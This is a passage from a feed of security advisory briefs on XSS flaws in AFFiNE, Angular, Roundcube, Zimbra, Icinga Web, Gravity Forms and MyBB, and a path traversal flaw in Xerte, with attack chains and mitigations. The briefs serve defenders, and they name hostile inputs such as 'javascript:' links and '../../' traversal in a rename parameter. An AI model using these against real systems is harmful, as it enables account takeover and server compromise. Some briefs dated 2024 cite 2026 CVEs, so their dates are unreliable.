addresses. The stored XSS vulnerability enables attackers to insert JavaScript links within bookmark cards. The researcher reported that the AFFiNE maintainers have been unresponsive to vulnerability reports for months, despite ongoing commits to the repository, raising concerns about the security of AFFiNE users.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies an AFFiNE instance.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL targeting the \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint with a payload designed to reflect arbitrary headers, possibly revealing internal network information.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted URL to a victim, or the attacker directly accesses the vulnerable endpoint if internal IP leakage is the goal.\u003c/li\u003e\n\u003cli\u003eThe AFFiNE server fetches the URL and reflects the attacker-controlled headers in the response, leading to XSS execution in the victim\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker crafts a bookmark card containing a \u0026ldquo;javascript:\u0026rdquo; link.\u003c/li\u003e\n\u003cli\u003eThe attacker saves the malicious bookmark card within AFFiNE.\u003c/li\u003e\n\u003cli\u003eWhen a user clicks on the malicious bookmark card, the injected JavaScript code executes within their browser session, enabling further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe attacker can then steal cookies, redirect the user, or perform other actions within the context of the AFFiNE application.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of the reflected XSS vulnerability can expose internal IP addresses of AFFiNE instances, potentially affecting all users of the self-hosted application. The stored XSS vulnerability can lead to account takeover, data theft, or further propagation of malicious content within the AFFiNE workspace. AFFiNE has 66k stars on GitHub, indicating a significant user base, making the impact potentially widespread. The affected sectors are broad, as AFFiNE is a general-purpose productivity tool.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBlock the \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint at the network or proxy level as a temporary mitigation for the reflected XSS vulnerability, as suggested by the researcher.\u003c/li\u003e\n\u003cli\u003eEducate users to avoid clicking on links starting with \u0026ldquo;javascript:\u0026rdquo; in bookmark cards to prevent exploitation of the stored XSS vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect access to the vulnerable \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect bookmark cards with suspicious JavaScript links.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T12:09:56Z","date_published":"2026-03-19T12:09:56Z","id":"/briefs/2026-03-affine-xss/","summary":"Two critical XSS vulnerabilities, Reflected XSS in the /image-proxy endpoint and Stored XSS in bookmark cards, were discovered in AFFiNE, a self-hosted alternative to Notion, with the vendor being unresponsive.","title":"Critical XSS Vulnerabilities in AFFiNE","url":"https://feed.craftedsignal.io/briefs/2026-03-affine-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["angular","xss","vulnerability"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA cross-site scripting (XSS) vulnerability has been identified in the Angular framework, specifically affecting versions prior to 22.0.0-next.3, 21.2.4, 20.3.18, and 19.2.20. The vulnerability stems from the interaction between security-sensitive attributes (e.g., href) and Angular\u0026rsquo;s internationalization features. When internationalization is enabled for such attributes using \u003ccode\u003ei18n-name\u003c/code\u003e, the built-in sanitization mechanisms can be bypassed. This can be exploited by injecting malicious scripts through data bindings that handle untrusted, user-generated data. Successful exploitation allows an attacker to execute arbitrary code within the context of the affected application\u0026rsquo;s domain. Immediate patching is strongly advised.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies an Angular application using a vulnerable version (prior to 22.0.0-next.3, 21.2.4, 20.3.18, or 19.2.20).\u003c/li\u003e\n\u003cli\u003eThe attacker locates an input field or URL parameter that allows the injection of user-controlled data into an \u003ccode\u003ehref\u003c/code\u003e attribute (or another security-sensitive attribute).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing JavaScript code. The payload leverages the \u003ccode\u003ei18n-name\u003c/code\u003e attribute in conjunction with data binding to bypass sanitization.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the malicious payload into the targeted input field or URL parameter.\u003c/li\u003e\n\u003cli\u003eThe victim user interacts with the application, triggering the rendering of the malicious payload within the vulnerable attribute.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code executes within the victim\u0026rsquo;s browser, operating under the security context of the Angular application\u0026rsquo;s domain.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to perform actions such as stealing session cookies or authentication tokens (session hijacking).\u003c/li\u003e\n\u003cli\u003eThe attacker can then exfiltrate sensitive data or perform unauthorized actions on behalf of the user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability allows attackers to execute arbitrary code within the context of the vulnerable Angular application. This can lead to session hijacking, enabling attackers to impersonate users and access their data. Data exfiltration is also possible, allowing attackers to steal sensitive information such as personal data or financial details. Furthermore, attackers can perform unauthorized actions on behalf of the user, potentially leading to financial loss, reputational damage, or other adverse consequences. The CCB strongly recommends immediate patching.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Angular installations to versions 22.0.0-next.3, 21.2.4, 20.3.18, or 19.2.20 to remediate the vulnerability as per the vendor advisory (\u003ca href=\"https://github.com/angular/angular/security/advisories/GHSA-g93w-mfhg-p222\"\u003ehttps://github.com/angular/angular/security/advisories/GHSA-g93w-mfhg-p222\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) with rules to detect and block common XSS payloads. This can provide an additional layer of defense against exploitation attempts.\u003c/li\u003e\n\u003cli\u003eEnable and review web server access logs for suspicious activity and potential XSS attempts. Analyze logs for unusual URL parameters or POST data containing script-like syntax.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-17T19:19:33Z","date_published":"2026-03-17T19:19:33Z","id":"/briefs/2026-03-angular-xss/","summary":"A cross-site scripting (XSS) vulnerability exists in Angular versions prior to 22.0.0-next.3, 21.2.4, 20.3.18, and 19.2.20, allowing attackers to execute arbitrary code within the context of the vulnerable application, potentially leading to session hijacking, data exfiltration, and unauthorized actions.","title":"Angular Cross-Site Scripting (XSS) Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-angular-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":6.1,"id":"CVE-2024-37383"},{"cvss":6.1,"id":"CVE-2024-37384"},{"cvss":9.8,"id":"CVE-2024-37385"}],"_cs_exploited":false,"_cs_products":["Roundcube"],"_cs_severities":["medium"],"_cs_tags":["roundcube","xss","vulnerability"],"_cs_type":"advisory","_cs_vendors":["Roundcube"],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in Roundcube, a widely used webmail solution. An attacker exploiting these vulnerabilities can perform cross-site scripting (XSS) attacks, potentially leading to the disclosure of sensitive information. This poses a significant risk to organizations relying on Roundcube for email communication, as successful exploitation could compromise user accounts, expose confidential emails, and enable further malicious activities within the affected environment. The CERT-Bund advisory WID-SEC-2024-1754 highlights the risk, emphasizing the need for immediate mitigation measures.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Roundcube instance.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing XSS code.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the payload into a Roundcube page, possibly through a crafted email or a vulnerable input field.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the compromised page.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the attacker\u0026rsquo;s XSS code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s script steals the victim\u0026rsquo;s session cookies or other sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to impersonate the victim and access their email account.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates confidential information or performs further malicious actions, such as sending phishing emails to other users.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these Roundcube vulnerabilities can lead to severe consequences. An attacker could gain unauthorized access to user email accounts, steal sensitive information, and conduct further malicious activities, like phishing or data breaches. The impact includes potential financial losses, reputational damage, and legal liabilities due to compromised data. The number of affected users and organizations depends on the scale of Roundcube deployments, but the potential impact is substantial.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Roundcube URI Activity\u003c/code\u003e to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eReview Roundcube configuration and apply security best practices to minimize the attack surface.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding to prevent XSS attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-06-24T10:00:00Z","date_published":"2024-06-24T10:00:00Z","id":"/briefs/2024-06-roundcube-xss/","summary":"Multiple vulnerabilities in Roundcube allow an attacker to perform a cross-site scripting attack and disclose confidential information.","title":"Roundcube Vulnerabilities Leading to Cross-Site Scripting and Information Disclosure","url":"https://feed.craftedsignal.io/briefs/2024-06-roundcube-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":6.1,"id":"CVE-2025-48700"}],"_cs_exploited":false,"_cs_products":["Zimbra Collaboration Suite (ZCS)"],"_cs_severities":["medium"],"_cs_tags":["xss","vulnerability","zimbra"],"_cs_type":"advisory","_cs_vendors":["Synacor"],"content_html":"\u003cp\u003eA cross-site scripting (XSS) vulnerability, identified as CVE-2025-48700, exists within the Synacor Zimbra Collaboration Suite (ZCS). This flaw could be exploited by attackers to inject and execute arbitrary JavaScript code within a user\u0026rsquo;s web browser session when they interact with a compromised Zimbra instance. Successful exploitation could lead to the theft of session cookies, credential harvesting, or other malicious activities performed on behalf of the victim user. The vulnerability requires user interaction to trigger, making it essential to educate users about the risks of clicking on untrusted links or opening suspicious attachments. The scope of the vulnerability affects installations of Zimbra Collaboration Suite.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Zimbra Collaboration Suite (ZCS) instance.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious URL or injects malicious JavaScript into a ZCS component (e.g., email, calendar, or task).\u003c/li\u003e\n\u003cli\u003eThe attacker delivers the malicious URL or crafted item to a target user, often via phishing or social engineering.\u003c/li\u003e\n\u003cli\u003eThe user clicks on the malicious URL or interacts with the injected content within ZCS.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the attacker-controlled JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe JavaScript code steals the user\u0026rsquo;s session cookie or performs other malicious actions within the context of the user\u0026rsquo;s session.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to hijack the user\u0026rsquo;s session and gain unauthorized access to the Zimbra account.\u003c/li\u003e\n\u003cli\u003eThe attacker accesses sensitive information, sends malicious emails, or performs other unauthorized actions on behalf of the compromised user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to unauthorized access to sensitive information stored within the Zimbra Collaboration Suite. Attackers could potentially read emails, access contacts, steal credentials, and perform other malicious activities on behalf of the compromised user. This can result in data breaches, financial loss, and reputational damage. The number of potential victims depends on the number of users of the affected Zimbra instance.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply mitigations per vendor instructions to patch CVE-2025-48700 (\u003ca href=\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories)\"\u003ehttps://wiki.zimbra.com/wiki/Zimbra_Security_Advisories)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eFollow applicable BOD 22-01 guidance for cloud services if Zimbra ZCS is deployed in a cloud environment.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious URI Parameters for Potential XSS\u0026rdquo; to identify potentially malicious requests targeting ZCS.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of clicking on untrusted links and opening suspicious attachments to prevent exploitation of the XSS vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-zimbra-xss/","summary":"A cross-site scripting (XSS) vulnerability in Synacor Zimbra Collaboration Suite (ZCS) could allow attackers to execute arbitrary JavaScript within a user's session, potentially leading to unauthorized access to sensitive information.","title":"Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-zimbra-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Icinga Web","icinga-php-library"],"_cs_severities":["high"],"_cs_tags":["xss","web-application","icinga"],"_cs_type":"advisory","_cs_vendors":["Icinga"],"content_html":"\u003cp\u003eA reflected XSS vulnerability has been identified in Icinga Web, affecting versions up to 0.13.0. This vulnerability arises from the improper handling of malformed search requests, allowing an attacker to inject arbitrary JavaScript code into a victim\u0026rsquo;s browser. The attacker crafts a malicious URL containing the XSS payload and entices the victim to visit this URL. Upon visiting the crafted URL, the injected JavaScript code executes within the context of the Icinga Web application, potentially enabling the attacker to perform actions on behalf of the victim, steal sensitive information, or compromise the integrity of the application. The vulnerability was patched in version 0.13.1 and will be published as part of \u003ccode\u003eicinga-php-library\u003c/code\u003e version 0.19.2. Icinga Web versions 2.12.0 and later can mitigate the issue by enabling Content-Security-Policy (CSP).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing a reflected XSS payload within a malformed search request. The payload is designed to execute arbitrary JavaScript code in the victim\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the crafted URL to potential victims through various means, such as phishing emails, social engineering, or malicious websites.\u003c/li\u003e\n\u003cli\u003eThe victim clicks on the malicious URL, unknowingly initiating the XSS attack.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser sends the crafted HTTP request to the Icinga Web server.\u003c/li\u003e\n\u003cli\u003eThe Icinga Web server processes the request and reflects the malicious XSS payload back to the victim\u0026rsquo;s browser in the HTTP response.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser renders the HTTP response, executing the injected JavaScript code within the context of the Icinga Web application.\u003c/li\u003e\n\u003cli\u003eThe attacker can now execute arbitrary code, potentially stealing session cookies, performing actions on behalf of the user, or defacing the Icinga Web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised Icinga Web session to gain unauthorized access to sensitive data or perform malicious activities within the Icinga environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the Icinga Web application. This can lead to session hijacking, unauthorized access to sensitive data, defacement of the Icinga Web interface, or further compromise of the Icinga infrastructure. While the exact number of victims is unknown, any organization using vulnerable versions of Icinga Web is at risk. The severity is high due to the potential for significant impact on confidentiality, integrity, and availability.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Icinga Web to version 0.13.1 or later to patch the vulnerability. This version contains the fix for CVE-2026-42224.\u003c/li\u003e\n\u003cli\u003eFor Icinga Web versions 2.12.0 and later, enable Content-Security-Policy (CSP) in the general configuration to mitigate the risk of XSS attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Icinga Web XSS Attempt via URI\u0026rdquo; to your SIEM to detect potential exploitation attempts by monitoring for suspicious URI patterns.\u003c/li\u003e\n\u003cli\u003eReview web server logs for unusual or malformed requests targeting the Icinga Web application to identify potential XSS attack attempts (webserver log source).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-icinga-web-xss/","summary":"A reflected cross-site scripting (XSS) vulnerability exists in Icinga Web versions 0.13.0 and earlier, allowing attackers to inject malicious JavaScript into a victim's browser through malformed search requests, potentially leading to arbitrary code execution within the Icinga Web context.","title":"Icinga Web Reflected XSS Vulnerability via Malformed Search Requests","url":"https://feed.craftedsignal.io/briefs/2024-01-icinga-web-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.1,"id":"CVE-2026-34414"}],"_cs_exploited":false,"_cs_products":["Xerte Online Toolkits (\u003c= 3.15)"],"_cs_severities":["critical"],"_cs_tags":["path-traversal","remote-code-execution","xss"],"_cs_type":"advisory","_cs_vendors":["Xerte"],"content_html":"\u003cp\u003eXerte Online Toolkits, a tool used to create online learning materials, is vulnerable to a path traversal vulnerability (CVE-2026-34414) in versions 3.15 and earlier. The vulnerability exists in the elFinder connector endpoint at \u003ccode\u003e/editor/elfinder/php/connector.php\u003c/code\u003e. The \u003ccode\u003ename\u003c/code\u003e parameter within rename commands is not properly sanitized, allowing attackers to use directory traversal sequences (e.g., \u003ccode\u003e../\u003c/code\u003e) to manipulate file locations. This flaw can be exploited to overwrite application files, inject stored cross-site scripting (XSS), or, when combined with other vulnerabilities, achieve unauthenticated remote code execution (RCE). This poses a significant threat to organizations utilizing affected versions of Xerte Online Toolkits, potentially leading to data breaches, system compromise, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Xerte Online Toolkits instance running version 3.15 or earlier.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request to \u003ccode\u003e/editor/elfinder/php/connector.php\u003c/code\u003e targeting the rename command.\u003c/li\u003e\n\u003cli\u003eWithin the request, the \u003ccode\u003ename\u003c/code\u003e parameter contains directory traversal sequences (e.g., \u003ccode\u003e../../\u003c/code\u003e) and the desired destination path.\u003c/li\u003e\n\u003cli\u003eThe server, due to insufficient input validation, processes the request without properly sanitizing the \u003ccode\u003ename\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe attacker moves a file (e.g., an uploaded image or media file) from its original project media directory to a new location specified within the malicious \u003ccode\u003ename\u003c/code\u003e parameter. This could involve moving a file to the application root directory.\u003c/li\u003e\n\u003cli\u003eIf the attacker moves a specifically crafted PHP file to the application root and the webserver is configured to execute PHP files in the root, the attacker can then access this file via a web request.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains complete control of the Xerte Online Toolkits instance and potentially the underlying server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to several critical consequences. Attackers can overwrite sensitive application files, leading to denial of service or system instability. The injection of malicious JavaScript code can result in stored cross-site scripting (XSS) attacks, compromising user accounts and data. The most severe outcome is unauthenticated remote code execution (RCE), enabling attackers to gain complete control over the affected server, potentially leading to data breaches, malware deployment, and further lateral movement within the network. The CVSS v3.1 base score for this vulnerability is 7.1, indicating a high level of risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Xerte Online Toolkits to a version greater than 3.15 to patch CVE-2026-34414.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Path Traversal in Xerte Connector\u003c/code\u003e to identify attempted exploitation of the path traversal vulnerability by monitoring requests to \u003ccode\u003e/editor/elfinder/php/connector.php\u003c/code\u003e with directory traversal sequences.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on the \u003ccode\u003ename\u003c/code\u003e parameter within the elFinder connector to prevent path traversal attacks.\u003c/li\u003e\n\u003cli\u003eReview web server configurations to prevent the execution of PHP files from the web root directory.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-xerte-path-traversal/","summary":"Xerte Online Toolkits 3.15 and earlier are vulnerable to relative path traversal, allowing attackers to move files and potentially achieve remote code execution.","title":"Xerte Online Toolkits Path Traversal Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-xerte-path-traversal/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5110"}],"_cs_exploited":false,"_cs_products":["Gravity Forms plugin \u003c= 2.10.0"],"_cs_severities":["medium"],"_cs_tags":["xss","wordpress","gravityforms"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe Gravity Forms plugin, a widely used WordPress plugin, is susceptible to an unauthenticated stored cross-site scripting (XSS) vulnerability. This flaw, identified as CVE-2026-5110, affects versions up to and including 2.10.0. The vulnerability stems from inadequate input validation and output escaping specifically within the SingleProduct field when it is nested inside a Repeater field. This bypasses normal state validation, allowing attackers to inject malicious HTML and JavaScript into the product name field. The injected payload is then stored unsanitized in the database. This vulnerability allows unauthenticated attackers to inject arbitrary web scripts that execute whenever an administrator accesses an entry containing the malicious payload through the WordPress admin interface.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious request to a WordPress endpoint utilizing the Gravity Forms plugin.\u003c/li\u003e\n\u003cli\u003eThe attacker injects arbitrary HTML and JavaScript into the \u0026lsquo;product name\u0026rsquo; field (input .1) of a SingleProduct field nested within a Repeater field.\u003c/li\u003e\n\u003cli\u003eDue to insufficient validation within the \u003ccode\u003evalidate_subfield()\u003c/code\u003e method, the malicious input bypasses the state validation mechanism \u003ccode\u003e(failed_state_validation())\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esanitize_entry_value()\u003c/code\u003e method returns the raw, unsanitized value because HTML is not expected for the affected field type.\u003c/li\u003e\n\u003cli\u003eThe malicious input is stored in the WordPress database without proper sanitization or escaping.\u003c/li\u003e\n\u003cli\u003eAn administrator accesses the Gravity Forms entries page in the WordPress admin interface (wp-admin/admin.php?page=gf_entries).\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eget_value_entry_detail()\u003c/code\u003e method retrieves the malicious product name from the database and outputs it without proper escaping.\u003c/li\u003e\n\u003cli\u003eThe stored XSS payload executes in the administrator\u0026rsquo;s browser, potentially allowing the attacker to perform actions with the administrator\u0026rsquo;s privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript code in the context of an administrator\u0026rsquo;s browser session. This can lead to account compromise, data theft, or further malicious activities within the WordPress administration panel. The vulnerability affects all users of the Gravity Forms plugin on WordPress installations with versions up to and including 2.10.0.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Gravity Forms plugin to the latest version (greater than 2.10.0) to patch CVE-2026-5110.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u003ccode\u003eDetect Gravity Forms XSS Attempt\u003c/code\u003e to identify potential exploitation attempts by monitoring for specific patterns in HTTP requests.\u003c/li\u003e\n\u003cli\u003eEnable web server logging to capture detailed information about HTTP requests and responses, enabling the Sigma rule\u0026rsquo;s effectiveness.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-gravity-forms-xss/","summary":"The Gravity Forms plugin for WordPress is vulnerable to unauthenticated stored cross-site scripting (XSS) in versions up to 2.10.0, allowing attackers to inject arbitrary JavaScript code into the product name field within repeater fields, which executes when an administrator views the affected entry.","title":"Gravity Forms Plugin Unauthenticated Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-gravity-forms-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5112"}],"_cs_exploited":false,"_cs_products":["Gravity Forms plugin"],"_cs_severities":["medium"],"_cs_tags":["xss","wordpress","gravityforms"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe Gravity Forms plugin for WordPress, a widely used form management tool, contains a vulnerability that can be exploited by unauthenticated attackers. Specifically, versions up to and including 2.10.0 are susceptible to Stored Cross-Site Scripting (XSS) due to insufficient input validation and output escaping of Calculation Product field names within Repeater fields. This flaw resides in how the plugin processes and renders form submissions containing malicious HTML within the product name field. The vulnerability allows an attacker to inject arbitrary web scripts that execute in the context of an authenticated administrator\u0026rsquo;s session when they access the entry detail page within the WordPress admin panel. Successful exploitation enables attackers to perform actions with the privileges of the compromised administrator.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious form submission.\u003c/li\u003e\n\u003cli\u003eThe malicious payload is placed in the Calculation Product field\u0026rsquo;s product name (.1) within a Repeater field.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003evalidate()\u003c/code\u003e method in the \u003ccode\u003eGF_Field_Calculation\u003c/code\u003e class inadequately validates the product name field, failing to sanitize malicious HTML.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esanitize_entry_value()\u003c/code\u003e method returns the raw, unsanitized value for the product name field, as HTML sanitization is not expected for this field.\u003c/li\u003e\n\u003cli\u003eThe malicious form submission is saved as an entry in WordPress.\u003c/li\u003e\n\u003cli\u003eAn authenticated administrator with the \u003ccode\u003egravityforms_view_entries\u003c/code\u003e capability accesses the entry detail page in \u003ccode\u003ewp-admin\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eget_value_entry_detail()\u003c/code\u003e method concatenates the unsanitized product name directly into the output string.\u003c/li\u003e\n\u003cli\u003eThe repeater\u0026rsquo;s \u003ccode\u003eget_value_entry_detail()\u003c/code\u003e method renders the unsanitized output, leading to the execution of the injected XSS payload within the administrator\u0026rsquo;s browser.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript code within the context of an authenticated WordPress administrator\u0026rsquo;s session. This can lead to account takeover, data theft, or further malicious actions performed on the WordPress site. While the number of potentially affected sites is large due to the plugin\u0026rsquo;s popularity, the impact is limited to administrators who access the specific entry containing the malicious payload.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Gravity Forms plugin to a version greater than 2.10.0 to patch CVE-2026-5112.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eDetect Gravity Forms XSS via Product Name\u003c/code\u003e to detect attempts to inject malicious scripts into product names.\u003c/li\u003e\n\u003cli\u003eReview and audit existing Gravity Forms entries for suspicious content in Calculation Product fields to identify potential exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-gravityforms-xss/","summary":"The Gravity Forms plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting (XSS) in versions up to and including 2.10.0, allowing unauthenticated attackers to inject arbitrary web scripts via form submissions that execute when an administrator views the entry detail page.","title":"Gravity Forms Plugin Unauthenticated Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-gravityforms-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2018-25309"}],"_cs_exploited":false,"_cs_products":["Recent threads 17.0"],"_cs_severities":["medium"],"_cs_tags":["xss","cve-2018-25309","web-application"],"_cs_type":"advisory","_cs_vendors":["MyBB"],"content_html":"\u003cp\u003eMyBB Recent Threads 17.0 is vulnerable to a persistent cross-site scripting (XSS) vulnerability, identified as CVE-2018-25309. This vulnerability allows attackers to inject malicious JavaScript code into the subject lines of forum threads. When other users view the index page or any page displaying the affected thread titles, the injected script executes within their browsers. This can lead to session hijacking, defacement, or other malicious actions. The vulnerability was reported in 2018 but remains relevant for older MyBB installations that have not been patched or upgraded. The attacker exploits a lack of proper input sanitization in the thread creation process.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious thread subject containing JavaScript code (e.g., 